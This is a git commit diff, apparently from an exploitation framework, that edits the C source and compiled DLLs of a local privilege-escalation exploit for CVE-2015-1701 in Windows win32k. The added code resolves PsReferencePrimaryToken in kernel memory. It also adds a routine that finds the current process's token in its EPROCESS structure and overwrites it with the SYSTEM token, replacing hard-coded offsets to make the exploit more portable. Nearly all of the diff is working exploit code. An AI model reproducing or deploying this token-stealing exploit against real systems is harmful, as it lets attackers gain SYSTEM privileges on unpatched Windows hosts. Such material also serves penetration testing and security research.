Quick hack to remove hard-coded offsets

2015-06-05 13:19:41 +10:00 · 2015-06-05 13:19:41 +10:00 · b291d41b76
parent a6467f49ec
commit b291d41b76
3 changed files with 48 additions and 11 deletions
--- a/data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll
+++ b/data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll
--- a/data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll
+++ b/data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll
--- a/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
+++ b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
@ -70,7 +70,13 @@ pUser32_ClientCopyImage		g_originalCCI = NULL;
 PVOID						g_ppCCI = NULL, g_w32theadinfo = NULL;
 int							g_shellCalled = 0;
 DWORD						g_OurPID;
-DWORD						g_EPROCESS_TokenOffset = 0;
+
+
+typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
+	_Inout_  PVOID Process
+);
+
+lPsReferencePrimaryToken pPsReferencePrimaryToken = NULL;

 typedef NTSTATUS (NTAPI *PRtlGetVersion)( _Inout_	PRTL_OSVERSIONINFOW lpVersionInformation );

@ -272,6 +278,9 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 			break;
 		}

+		pPsReferencePrimaryToken = (lPsReferencePrimaryToken)GetProcAddress(MappedKernel, "PsReferencePrimaryToken");
+		pPsReferencePrimaryToken = (lPsReferencePrimaryToken)((DWORD_PTR)KernelBase + ((DWORD_PTR)pPsReferencePrimaryToken - (DWORD_PTR)MappedKernel));
+
 		FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsLookupProcessByProcessId");
 		FuncAddress = KernelBase + FuncAddress - (ULONG_PTR)MappedKernel;

@ -329,6 +338,36 @@ HWND GetFirstThreadHWND(
 	return 0;
 }

+// Search the specified data structure for a member with CurrentValue.
+BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
+{
+	DWORD_PTR dwIndex, dwMask;
+
+	// Microsoft QWORD aligns object pointers, then uses the lower three
+	// bits for quick reference counting.
+#ifdef _M_X64
+	dwMask = ~0xf;
+#else
+	dwMask = ~7;
+#endif
+	// dwMask out the reference count.
+	dwCurrentValue &= dwMask;
+
+	// Scan the structure for any occurrence of dwCurrentValue.
+	for (dwIndex = 0; dwIndex < dwMaxSize; dwIndex++)
+	{
+		if ((pdwStructure[dwIndex] & dwMask) == dwCurrentValue)
+		{
+			// And finally, replace it with NewValue.
+			pdwStructure[dwIndex] = dwNewValue;
+			return TRUE;
+		}
+	}
+
+	// Member not found.
+	return FALSE;
+}
+
 /*
 * StealProcessToken
 *
@ -349,9 +388,14 @@ NTSTATUS NTAPI StealProcessToken(
 	if (NT_SUCCESS(Status)) {
 		Status = g_PsLookupProcessByProcessIdPtr((HANDLE)4, &SystemProcess);
 		if (NT_SUCCESS(Status)) {
-			if (g_EPROCESS_TokenOffset) {
-				*(PVOID *)((PBYTE)CurrentProcess + g_EPROCESS_TokenOffset) = *(PVOID *)((PBYTE)SystemProcess + g_EPROCESS_TokenOffset);
-			}
+			PACCESS_TOKEN targetToken = pPsReferencePrimaryToken(CurrentProcess);
+			PACCESS_TOKEN systemToken = pPsReferencePrimaryToken(SystemProcess);
+
+			// Find the token in the target process, and replace with the system token.
+			find_and_replace_member((PDWORD_PTR)CurrentProcess,
+				(DWORD_PTR)targetToken,
+				(DWORD_PTR)systemToken,
+				0x200);
 		}
 	}
 	return Status;
@ -436,13 +480,6 @@ void win32k_client_copy_image(LPVOID lpPayload)
 	g_OurPID = GetCurrentProcessId();
 	g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId();

-#ifdef _WIN64
-	g_EPROCESS_TokenOffset = 0x208;
-#else
-	g_EPROCESS_TokenOffset = 0xF8;
-#endif
-
-
 	if (g_PsLookupProcessByProcessIdPtr == NULL) {
 		ExitProcess((UINT)-3);
 		return;